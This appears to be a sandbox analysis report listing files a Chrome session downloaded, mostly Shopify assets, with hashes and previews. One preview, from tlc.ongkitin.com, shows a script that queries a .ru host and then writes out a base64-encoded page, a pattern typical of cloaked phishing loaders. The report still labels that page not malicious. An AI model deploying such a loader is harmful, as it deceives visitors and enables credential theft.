                                                                    Category:downloaded
                                                                    Size (bytes):19454
                                                                    Entropy (8bit):7.949804514472039
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:DB7F70CAC7CC99F042913701EE8E5314
                                                                    SHA1:5192A1735111533CD4BAA83E85D719E80289EBE3
                                                                    SHA-256:565B72C5783B45D6DBFE7D2F1495072B30502B0354AE2AEA787E137A94579430
                                                                    SHA-512:554606B0E7BFE7A112F177E5515658FA959E3E6DBC8B38C33D7C7A8171F0B0269BFEB9DE603F3B417A1F3AF2F425AF9F583ECAD405A1268985900291F2FD22E9
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:"https://cdn.shopify.com/b/shopify-brochure2-assets/59c9580201098febc263baf2cf90550b.png?width=636&height=636,%20https://cdn.shopify.com/b/shopify-brochure2-assets/59c9580201098febc263baf2cf90550b.png%20x2"
                                                                    Preview:RIFF.K..WEBPVP8X....8...{..z..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........ALPH.........jk...c.. ......n..........bwwwww{....&`s.#.a.1.......c>7vDL......E./......_.........E./......_..........i.fwp...R.1..VX..Q..p.W...0D..U.8....M....^.g.z.I.......zk.Iw8...V..1E-wX{.....>v..^z.....7..uW_y..........ox.}..y...bX.".!j...;......s.].8_.8.Rl.7.....3..R.C.+D.Y..oz.3.s..f....{..........K....;.5..a.+4......u....,...c...#...ye....q.~+i.!......].....#...jl.9m\K.f.|.g_}.I..,.P.B.4.z.._...0...b..ml..s..uW..{n/)..V...$.z..2g.q,....65.........e.8..!Ii.c...@..6._..]k..-...A.HJ)Lv1j.=..%.:..........?e7I
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):3368
                                                                    Entropy (8bit):4.668659994090744
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:1D6091CE14B313A3C9A19F237DF898BB
                                                                    SHA1:D6650A12EFB3452A6014FB65DB4B0179318E78B3
                                                                    SHA-256:9F250F27A1663ABB5C1AECBA408D7B5D06402F9C2F36843E3D2AE764850AF5BD
                                                                    SHA-512:0ED9393D4D19F58953DCE545C3AE2D7338E416F052006AFC4AF4BA6644F6DC2B266DA0FA44C36A4F3A8E2A1E4593F8DA7DA5D5AEBB2305C8A142D189BA37F0FC
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="153" height="63" viewBox="0 0 153 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="152" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1549_7011)"/>.<g clip-path="url(#clip0_1549_7011)">.<path d="M107.394 28.69C106.878 28.3769 106.235 27.8438 106.261 27.1753C106.251 26.8852 106.315 26.5974 106.449 26.3396C106.582 26.0817 106.78 25.8625 107.022 25.703C108.858 24.9584 110.627 26.1177 112.099 27.0907C112.099 25.1869 112.099 23.2915 112.031 21.4553C109.154 19.56 104.078 19.3484 101.361 21.8361C100.426 22.6322 99.7363 23.6776 99.3723 24.8506C99.0083 26.0236 98.985 27.2758 99.3052 28.4615C99.8044 30.8307 102.368 32.3877 104.518 33.183C105.296 33.7415 106.523 34.4015 106.21 35.5777C106.142 35.8089 106.02 36.0206 105.854 36.1953C105.69 36.3739 105.491 36.5178 105.271 36.6184C104.242 36.7956 103.187 36.7352 102.185 36.4419C101.183 36.1486 100.262 35.6301 99.4914 34.9261C99.4914 36.7623 99.4914 38.6238 99.5675 40.4092C100.515 41.046 1
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (1991)
                                                                    Category:downloaded
                                                                    Size (bytes):1992
                                                                    Entropy (8bit):4.807172644740663
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:D7747B9E1268D5226ABCF9066CA5FF95
                                                                    SHA1:0FBEDE738FFC42E6C9BF2F30885CA3D1A3D95C16
                                                                    SHA-256:77EC0537E746660F7CE332CFB2DCBA06AEEDC2651E5877DC8879A8AAE32EAC61
                                                                    SHA-512:82F523D754129F1AB5546885AD4F276982E610B13B69D675C55EB14B3A6A8E66A846A2B5975D4D1B750F98AF4970A1428FC2C8E7535E1995F10F250E1BA83231
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-FVEZ4QIF.js
                                                                    Preview:var r=(t=>(t.Gdpr="gdpr",t.Ccpa="ccpa",t.None="none",t))(r||{}),i=(a=>(a.PassiveConsent="passive_consent",a.ActiveConsent="active_consent",a))(i||{});var s=(e=>(e.Apps="apps",e.Arrow="arrow",e.Bag="bag",e.BlogPost="blog_post",e.Boost="boost",e.BuyOnline="buy_online",e.Champion="champion",e.Check="check",e.Chevron="chevron",e.Checkmark="checkmark",e.CheckmarkCircle="checkmark_circle",e.Close="close",e.Code="code",e.Collapse="collapse",e.CollectEmail="collect_email",e.ComputerTick="computer_tick",e.CreditCard="credit_card",e.CustomerExperience="customer_experience",e.CustomerSupport="customer_support",e.Design="design",e.Detect="detect",e.Devices="devices",e.DiagonalArrow="diagonal_arrow",e.Discount="discount",e.Domain="domain",e.DragAndDrop="drag_and_drop",e.Expand="expand",e.ExpandCollapse="expand_collapse",e.Filters="filters",e.FlexibleShopping="flexible_shopping",e.FlexibleTime="flexible_time",e.Gift="gift",e.Global="global",e.GlobalCurrency="global_currency",e.Group="group",e.Guaran
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (5893)
                                                                    Category:downloaded
                                                                    Size (bytes):5894
                                                                    Entropy (8bit):5.464112190039324
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E0D4C6CF21BAFC2B331CBDBF28C7A877
                                                                    SHA1:5DDCF84D535A0F957C39B834A039B88A793A0E85
                                                                    SHA-256:FD914C3D5A6477967656DC2AFD4394B5739E7AA38F49317492181435EC2CEF53
                                                                    SHA-512:F75EC5E6FF7F3BA1E4B6F742BAA59C4F63886AC55020E0C2976003F243DAABFBA773DE532FC24EEDFE9CA6F25E17BBFBF10ED65630058BC860E1BBFFD0B9083A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-LEHU3LRW.js
                                                                    Preview:import{b as M}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-LKGIZDZ2.js";import{a as O,b as R}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-EFIPG37A.js";import{a as oe}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-2IKKNHFG.js";import{T as w,X as V}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";import{a as I,b as P,c as h,g as y}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-PD2NQNQL.js";import{a as x}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-XG4BM7HW.js";import{e as E}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";function A(e="200"){let{site:t,realCountryCode:o,regionCode:i,enPath:c,experimentVariationId:m}=w(),{metadata:l}=V(),u=o||"no_country",[,n,s]=c?.split("/")||[];return{affiliate:"",blogId:"",blogCategory:"",complianc
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:HTML document, ASCII text, with very long lines (5981), with CRLF line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):6408
                                                                    Entropy (8bit):5.8922163633581475
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:CEBEC5ADD6E602210FC7E072C46AE8BF
                                                                    SHA1:9B989511E4055CCCC5800041DFC1B25FC337EB92
                                                                    SHA-256:6A72C8DAACFE976695736736CE9BC287FD476A8D5D7537709CD70D2AA31DF8DB
                                                                    SHA-512:FB60133715D974E77786C1DD1AE2821324AD56657CCB180F092B91C0B7477F976B64706B2C77BC8D888E1E73E85B174BE7FFBE1FE23E1039FD96002D12FEE3F8
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://tlc.ongkitin.com/ywhamyco/
                                                                    Preview:<style>body {.. margin: 0;..}..</style>..<script>..fetch('https://rKq.6gniu68.ru/GOnzIfZMvkXQkmOYZRXcGWYoSvZUERGSKZKQCZMFTTBTURDEZDRJOCTJQJEAWNJCDZNAVSIOPNWCNI', {..method: "GET",..}).then(response => {..return response.text()..}).then(text => {..if(text == 0){..document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPG1ldGEgaHR0cC1lcXVpdj0iWC1VQS1Db21wYXRpYmxlIiBjb250ZW50PSJJRT1lZGdlIj4NCiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEuMCI+DQogICAgPHRpdGxlPlFGSkN4VnhRYnQ8L3RpdGxlPg0KICAgIDxzdHlsZT4NCiNIZ3BvVXBoaGhYICogew0KICAgIHBhZGRpbmc6IDA7DQogICAgbWFyZ2luOiAwOw0KICAgIGJveC1zaXppbmc6IGJvcmRlci1ib3g7DQogICAgZm9udC1mYW1pbHk6ICJTZWdvZSBVSSIsIkhlbHZldGljYSBOZXVlI
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (4420)
                                                                    Category:downloaded
                                                                    Size (bytes):4421
                                                                    Entropy (8bit):5.068523322931182
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:89958D9BB680EBE5729BBD974DA835C2
                                                                    SHA1:B2BF5EEB6C5800A8252B94106334129C579E5892
                                                                    SHA-256:9394F87F28B3766BF510C9091B73E81BC3CF0704EE76FD1228D31F96A1EC9969
                                                                    SHA-512:BED88FB8100C29B7049F5A0B40819E11114194185A9B5E677F405B0D145C3D2999CB5A38EB3CF19FDBEEF32BD02FEA62E23251BFF031BDAC381F10EB2A63F724
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/root-BMYHQXYN.js
                                                                    Preview:import{a as p}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-ZPNA2BVT.js";import{a as m}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-K3FMO2M6.js";import"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3ENXFNAO.js";import"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-L3M65SDF.js";import"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TZCLUSIF.js";import"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-OZUJT76U.js";import"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3HQUNPWN.js";import"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-2CMHK44O.js";import"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-DFKXNKV3.js";import"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-AEETYEVW.js";import"https://cdn.shopify
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:Java source, ASCII text, with very long lines (829)
                                                                    Category:downloaded
                                                                    Size (bytes):1019
                                                                    Entropy (8bit):5.203677024535998
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:694C9B3C38BB9B90F4D632A1410A25DE
                                                                    SHA1:16E4A977EA4086B59D145463C70876F07EE43F72
                                                                    SHA-256:9A3B0271FCC056AFA321D491454F5F097C43EC6CA334C8E607D98428668A87FF
                                                                    SHA-512:773011D6FBE51194B2536C24BC3A53BB7C35158B8D510B06437A9A6544E558F0E365A6AAC2CB0B6A593818041CE49BDEB47547815102B647DBEB68FF97D0B73A
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TV7DYCAO.js
                                                                    Preview:import{c as u}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";var c=u((p,i)=>{(function(){"use strict";var o={}.hasOwnProperty;function n(){for(var t="",e=0;e<arguments.length;e++){var r=arguments[e];r&&(t=f(t,s(r)))}return t}function s(t){if(typeof t=="string"||typeof t=="number")return t;if(typeof t!="object")return"";if(Array.isArray(t))return n.apply(null,t);if(t.toString!==Object.prototype.toString&&!t.toString.toString().includes("[native code]"))return t.toString();var e="";for(var r in t)o.call(t,r)&&t[r]&&(e=f(e,r));return e}function f(t,e){return e?t?t+" "+e:t+e:t}typeof i<"u"&&i.exports?(n.default=n,i.exports=n):typeof define=="function"&&typeof define.amd=="object"&&define.amd?define("classnames",[],function(){return n}):window.classNames=n})()});export{c as a};./*! Bundled license information:..classnames/index.js:. (*!. .Copyright (c) 2018 Jed Watson.. .Licensed under the MIT License (MIT), see. .http://jedwatson.github.io/
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:SVG Scalable Vector Graphics image
                                                                    Category:dropped
                                                                    Size (bytes):3222
                                                                    Entropy (8bit):4.499537624497862
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:F3ED9EE7EA392D376ACC1508613C45FC
                                                                    SHA1:39E1A0D95014AACA022352FA23544550E5898110
                                                                    SHA-256:AFAB0CA3D88622ECED65B33D85A91C6388655D025A416B41802C4169E101ACF2
                                                                    SHA-512:3FA7E8F8C8B7CDB7E9971D192F952F1F6E67A4A207EE3D3502BFC9CBBCECC5EA109591CA92ED2A23504C846A37148C64937672D796D7F415E4ED4DCC9C221CE3
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:<svg width="163" height="63" viewBox="0 0 163 63" fill="none" xmlns="http://www.w3.org/2000/svg">.<rect x="0.5" y="0.5" width="162" height="62" rx="7.28777" fill="white" stroke="url(#paint0_radial_1397_6466)"/>.<path d="M75.466 42.9297C74.4848 42.9297 73.8969 42.4069 73.8969 41.622C73.8969 40.8378 74.4848 40.3142 75.466 40.3142C76.4467 40.3142 77.0346 40.837 77.0346 41.6214C77.0346 42.4063 76.4467 42.9297 75.466 42.9297ZM75.466 39.6608C74.0927 39.6608 73.112 40.4449 73.112 41.622C73.112 42.799 74.0927 43.5833 75.466 43.5833C76.8388 43.5833 77.8195 42.799 77.8195 41.622C77.8195 40.4449 76.8388 39.6608 75.466 39.6608ZM66.5082 39.7914V41.1641H63.8933V39.7914H63.1091V43.4526H63.8933V41.8835H66.5082V43.4526H67.2924V39.7914H66.5082ZM87.1038 39.7914L85.6653 42.4719L84.2919 39.7914H83.0498V43.4526H83.7691V40.5107L85.2725 43.4526H85.9918L87.4959 40.4449V43.4526H88.2802V39.7914H87.1038ZM93.9034 39.7914V43.4526H97.8916V42.7334H94.6876V41.8835H97.4338V41.2299H94.6876V40.4455H97.8259V39.7914H93.903
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):184923
                                                                    Entropy (8bit):5.165668994367683
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:E2B86068D6B5E4674827E676185031FF
                                                                    SHA1:3407D8F0C7AF864A29D2C117DBAF85059F2EECEF
                                                                    SHA-256:4401964875CB2A5238DB15439508F040FC4CD8B056233617B4F743D8FB8C4159
                                                                    SHA-512:A5B9F74A2F5CA9B4FD2BAAE34FAC3B7A3DAED6701E475F139F5AE97E13735A9C0C5D2622EABCC8C02FB5125FFC0D3C9DC813F471055422383A94FE3E22FC711E
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_assets/home-RHBX6IWH.css
                                                                    Preview:@font-face{font-display:swap;font-family:ShopifySans;font-style:normal;font-weight:300;src:url(https://cdn.shopify.com/static/fonts/ShopifySans--light.woff2) format("woff2")}@font-face{font-display:swap;font-family:ShopifySans;font-style:normal;font-weight:400;src:url(https://cdn.shopify.com/static/fonts/ShopifySans--regular.woff2) format("woff2")}@font-face{font-display:swap;font-family:ShopifySans;font-style:normal;font-weight:500;src:url(https://cdn.shopify.com/static/fonts/ShopifySans--medium.woff2) format("woff2")}@font-face{font-display:swap;font-family:ShopifySans;font-style:normal;font-weight:700;src:url(https://cdn.shopify.com/static/fonts/ShopifySans--bold.woff2) format("woff2")}@font-face{font-display:swap;font-family:ShopifySans;font-style:normal;font-weight:800;src:url(https://cdn.shopify.com/static/fonts/ShopifySans--extrabold.woff2) format("woff2")}@font-face{font-display:swap;font-family:ShopifySans;font-style:normal;font-weight:900;src:url(https://cdn.shopify.com/stati
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (737), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):737
                                                                    Entropy (8bit):5.1653564174742925
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:AEF0FD9F0D452FDE31695E825D42C8D0
                                                                    SHA1:D4F6CBAC79A04585B719A03D271C20DCA76A8CE2
                                                                    SHA-256:4965C8FB8DB8DAA2B11D0F78E0D6FF63415768BD2794782ABAD99799703956CA
                                                                    SHA-512:C511B111BB54FCE98C229B11F41CFA06C0B39E97C5A1D6D79D8C1770F076B1F0B5F9AD8C6926467A931445C406B1E41624D483A6EF00683F506FA0C347E7E153
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://assets.visme.co/fonts/css/Roboto.css
                                                                    Preview:@font-face{font-family:roboto;font-weight:400;src:url(../fonts/roboto-v18-latin-regular.woff) format('woff')}@font-face{font-family:roboto;font-style:normal;font-weight:400;src:url(../fonts/Roboto-Cyrillic.woff2) format('woff2');unicode-range:U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116}@font-face{font-family:roboto;font-style:normal;font-weight:700;src:url(../fonts/Roboto-Bold-Cyrillic.woff2) format('woff2');unicode-range:U+0400-045F,U+0490-0491,U+04B0-04B1,U+2116}@font-face{font-family:roboto;font-style:normal;font-weight:700;src:url(../fonts/Roboto-Bold.woff2) format('woff2');unicode-range:U+0000-00FF,U+0131,U+0152-0153,U+02BB-02BC,U+02C6,U+02DA,U+02DC,U+2000-206F,U+2074,U+20AC,U+2122,U+2191,U+2193,U+2212,U+2215,U+FEFF,U+FFFD}
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 1920x1080, components 3
                                                                    Category:dropped
                                                                    Size (bytes):291248
                                                                    Entropy (8bit):7.984997205025379
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:4F5262C9A645C828286435AF76CFE5D3
                                                                    SHA1:A7C80F8BF1229207B1537FCD3EF802E44FDCAA96
                                                                    SHA-256:540CD242118B9AB1C506D0A7B9FA8E8B2FD49CAFA5DB3029D1371C2C79B7A8B6
                                                                    SHA-512:84AD538681DF4BAE2F44AFE04D64CEA889BDC430884E2484D795ABF19E3DDDA6981C4DDB7E9A87192150AB601E2D701709E20943946F110E8834F09B60C4711C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:......Exif..II*...........................V...........^...(.......................i.......f.......8c......8c................0210....................0100................................8...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......8...."..................................................................................X.../-.-..WX}....>......`b.J.C.8.V....km.iq.u;.....b.....0.0.....Q.6...n....=.BT.Sn..b..E............L.!.5S..Ff*F.0Lw..^.K.
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text
                                                                    Category:dropped
                                                                    Size (bytes):65
                                                                    Entropy (8bit):4.314128390879881
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:2DEA9F0F7E122E81EE9A3752902BDF19
                                                                    SHA1:8747D6D270E001CEEA1174FF1D365D9CDEA52DCD
                                                                    SHA-256:3D49CCE674B56473177888E83BA3303C68B74AF8F0032A94F4814F73F59132B9
                                                                    SHA-512:723AC6A0C7A4139882197D5E4B59A48DB20A83C63E498C8C5FA1E057DBA75F33A1F927CC286D006BF107A04211998873FCC82656B719C40D49F633C466F0CD8F
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    Preview:event: message.data: {"response":{"status_code":400,"body":""}}..
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):99982
                                                                    Entropy (8bit):5.565783398382647
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:C820F08B00FA777E80A9B51AF41D9699
                                                                    SHA1:74EB438DB6A417C39CF903AE7B68A2C6300CB1E3
                                                                    SHA-256:4B9D97A3F13826206B0CBE8AD7D8FC7B0F710426F3F3E3F10BD6231A40419EE6
                                                                    SHA-512:5B7204C8EFF1EFC2FA54520F524A0D104C534CD415F49CA2F74373D3A8DE62FC0F99DA23DA0C6873D268838EEA05C4BDDFF47536A3969026B335EC09476EA5E1
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/pages/shopify.com/($locale)-FZLIY3NL.js
                                                                    Preview:import{a as va,c as xa,e as ya}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-4JBVNCIW.js";import{a as ia,b as At}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-EENCBVFR.js";import{a as ka}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-LPQ43SSK.js";import{a as La}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HOIARNIC.js";import{a as fe}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-QBKJCLV2.js";import{a as fa}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-WDJ4YB2L.js";import{a as Ha}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-DLSA5SME.js";import"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-HRDKHAKO.js";import{a as ua}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-ER2J4DIE.js";import"https://cd
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (8835)
                                                                    Category:downloaded
                                                                    Size (bytes):8836
                                                                    Entropy (8bit):5.298618530298892
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:715907C2455849D94842C78195A7D46A
                                                                    SHA1:D2EE7A03DFAC63B0A844B7BDBBF46867BC0A72AD
                                                                    SHA-256:E6D8DB8D8354C6DBA008F6C592BC67F1AD0517DAF3387BDDD54CDE0AE3BD1E4A
                                                                    SHA-512:7E365483A9342EC0C7401E2A4592557913E7430A5800D07203DE135FA969C427745A31B11103AE283DD2F28BAE492B4755716DB8D8FD70F49F4888B8836DEA29
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-K3FMO2M6.js
                                                                    Preview:import{b as x}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3ENXFNAO.js";import{a as T,b as F}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-TBYT574J.js";import{O as D,P,Q as I,R as C,S as L,U as E,V as U,a as y,c as k,ca as A}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-BK6DPWKP.js";import{a as b}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-PD2NQNQL.js";import{a as S}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-3JBLRAUT.js";import{e as w}from"https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js";function d(n,t){if(!(n instanceof t))throw new TypeError("Cannot call a class as a function")}function u(n){return u=typeof Symbol=="function"&&typeof Symbol.iterator=="symbol"?function(t){return typeof t}:function(t){return t&&typeof Symbol=="function"&&t.constructor===Symbol&&t!==Symbol.pr
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):48
                                                                    Entropy (8bit):3.1994764927035653
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:52CAA374F9D8E80A43D843453A09451E
                                                                    SHA1:F20B4B2FC00180AD9895BED85B931F038BDCDF18
                                                                    SHA-256:4F8F48B18463DD38185B16DEEE997ADF27F88ED4036BEA70AFA90A9CE8DAD648
                                                                    SHA-512:FCBFDDCB33739EAF3E2E95086599D04E4FE7B07A3905E3710BD303C005EE2DEF632F2F59817895ABA8C0A1B14C77941FFCFE232E74E8401CB873AC3663E71E08
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://gtm.shopify.com/_set_cookie?val=m17noVvlNs0KUXr6bsyxS6c1gX4CP3reRRyeyw%2F7xIrdxbtSmpK78FpCdVh2UqgQQMWEvD%2BsV51%2BS%2BdzHlcqdXMU9jWy2v3COLqECAs05AbQIqvP9b1pt27ssolXhMIxKoYFhSeQtas7VqzQVGVt3VuZwifr%2FN5Eed%2BRJWHFTcL78SU2mKNjfoaloN4ci762WbS8LkSU3zonPCPDpu6GH7MNqGamrX%2BXeUlbRX7RoQ9tbY7KlkBAuN8LZRlkBsmiuWi8F6p%2B6CcVWjtKSp5eaLv11w%3D%3D
                                                                    Preview:R0lGODlhAQABAIAAAP///wAAACwAAAAAAQABAAACAkQBADs=
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (1100)
                                                                    Category:downloaded
                                                                    Size (bytes):1101
                                                                    Entropy (8bit):5.182146349568579
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:8458A27D61214F86202E4C298AE7DCBB
                                                                    SHA1:7834E2AF457AB4240256B55E9F0E42F7117CA434
                                                                    SHA-256:05D52C8563B016B39A44DBAD8A0CB788240916957C5AF82B0DF3D94D9B1B7A3A
                                                                    SHA-512:787813F2075F4BDB82A780D2502959A023AB5986175233268E995A968DB78D0DBFA06CE71DCB6D6AA57D9A4BD63E2C1A43491B9A81518A7B6F1CDCF22CCFA58C
                                                                    Malicious:false
                                                                    Reputation:unknown
                                                                    URL:https://cdn.shopify.com/shopifycloud/brochure-iii/production/_shared/chunk-G4JDLQHK.js
                                                                    Preview:var h=Object.create;var e=Object.defineProperty;var i=Object.getOwnPropertyDescriptor;var j=Object.getOwnPropertyNames;var k=Object.getPrototypeOf,l=Object.prototype.hasOwnProperty;var m=(a,b,c)=>b in a?e(a,b,{enumerable:!0,configurable:!0,writable:!0,value:c}):a[b]=c;var n=(a=>typeof require<"u"?require:typeof Proxy<"u"?new Proxy(a,{get:(b,c)=>(typeof require<"u"?require:b)[c]}):a)(function(a){if(typeof require<"u")return require.apply(this,arguments);throw new Error('Dynamic require of "'+a+'" is not supported')});var o=(a,b)=>()=>(a&&(b=a(a=0)),b);var p=(a,b)=>()=>(b||a((b={exports:{}}).exports,b),b.exports),q=(a,b)=>{for(var c in b)e(a,c,{get:b[c],enumerable:!0})},g=(a,b,c,f)=>{if(b&&typeof b=="object"||typeof b=="function")for(let d of j(b))!l.call(a,d)&&d!==c&&e(a,d,{get:()=>b[d],enumerable:!(f=i(b,d))||f.enumerable});return a};var r=(a,b,c)=>(c=a!=null?h(k(a)):{},g(b||!a||!a.__esModule?e(c,"default",{value:a,enumerable:!0}):c,a)),s=a=>g(e({},"__esModule",{value:!0}),a);var t=(a,
                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    File Type:ASCII text, with very long lines (1182), with no line terminators
                                                                    Category:downloaded
                                                                    Size (bytes):1182
                                                                    Entropy (8bit):5.335721071422308
                                                                    Encrypted:false
                                                                    SSDEEP:
                                                                    MD5:093B9426D2DCB535AEC9B39B246EAEF1
                                                                    SHA1:8D1022BB8C0E3A50ADB05BF9DC69463724AA589C
